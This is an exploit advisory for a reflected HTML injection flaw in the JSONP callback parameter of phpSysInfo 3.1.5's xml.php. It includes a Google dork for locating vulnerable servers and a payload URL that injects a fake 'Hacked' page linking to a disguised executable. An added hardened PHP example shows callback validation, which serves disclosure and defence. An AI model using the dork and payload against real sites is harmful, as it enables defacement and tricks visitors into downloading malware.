phpsysinfo 3.1.5 exploit

# Exploit Title: PhpSysInfo 3.1.5
# Google Dork: [inurl:”phpsysinfo” intitle:”System Information”]
# Date: 18/07/2013
# Exploit Author: Fabio Natalucci
# Vendor Homepage: http://rk4an.github.io/phpsysinfo/
# Software Link: http://rk4an.github.io/phpsysinfo/
# Version: 3.1.5
# Tested on: ALL
# CVE : none

Hello guys, this is a very simple hack.
This was a challenge with my “boss” (GI). I gave him a little demonstration that this script is not secure to put on servers.

# POC

File "xml.php"

#46 // if $output is correct generate output in proper type
#47 if (isset($output) && is_object($output)) {
#48     if (isset($_GET['json']) || isset($_GET['jsonp'])) {
#49         $json = json_encode(
#50             simplexml_load_string($output->getXMLString())
#51         );
#52         echo (isset($_GET['jsonp'])) ? $_GET['callback'] . '('.$json.')' : $json;
#53     } else {
#54         $output->run();
#55     }
#56 }

On line 52 the value of $_GET['callback'] is printed into the response exactly as received, with no validation or output encoding. This can be exploited in different ways.

Example: http://www.example.com/xml.php?jsonp=1&callback=<html><meta%20http-equiv=”Content-Type”%20content=”text/html;%20charset=UTF-8″%20/><a%20href=”../../badfiletodownloadwithurlobfuscation.exe”><h1>Hacked<br><h4>Hello boss, do you want play with me?</h4></h1></a><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR></html>
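
A hardened form of the JSONP branch on line 52, as an added example that is not part of the original advisory or of phpSysInfo's own code: the callback is accepted only if it is a dotted JavaScript identifier, and the response is sent with an explicit script content type. The function names safe_jsonp_callback and build_json_response, the 64-character limit and the sample data are assumptions made for illustration.

```php
<?php
// Added example, not phpSysInfo code. Function names are hypothetical.

// Return $name if it is a plain JavaScript callback reference
// (identifiers joined by dots, e.g. "cb" or "jQuery.cb123"), else null.
function safe_jsonp_callback($name)
{
    if (!is_string($name) || strlen($name) > 64) {   // 64 is an assumed limit
        return null;
    }
    $ident = '[A-Za-z_$][A-Za-z0-9_$]*';
    if (!preg_match('/\A' . $ident . '(?:\.' . $ident . ')*\z/', $name)) {
        return null;
    }
    return $name;
}

// Build array(content type, body) for a JSON or JSONP response.
// Returns null when JSONP was requested with a missing or invalid callback.
function build_json_response(array $query, $data)
{
    // Hex-escape <, >, &, ' and " so the JSON cannot form markup
    // even if a client renders the body as HTML.
    $json = json_encode($data, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);

    if (!isset($query['jsonp'])) {
        return array('application/json; charset=UTF-8', $json);
    }
    $raw = isset($query['callback']) ? $query['callback'] : null;
    $callback = safe_jsonp_callback($raw);
    if ($callback === null) {
        return null;
    }
    return array('application/javascript; charset=UTF-8', $callback . '(' . $json . ');');
}

// Constructed sample data standing in for the parsed XML output.
$response = build_json_response($_GET, array('Generation' => array('version' => 'sample')));
if ($response === null) {
    http_response_code(400);
    header('Content-Type: text/plain; charset=UTF-8');
    echo 'Invalid callback';
} else {
    header('Content-Type: ' . $response[0]);
    header('X-Content-Type-Options: nosniff');   // stop browsers sniffing the body as HTML
    echo $response[1];
}
```

With this check, a callback value containing angle brackets, spaces or quotes gets a 400 response with a plain-text body instead of being reflected.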

# Thanks to Fabrizio and Giulio for fun.
# Cheers!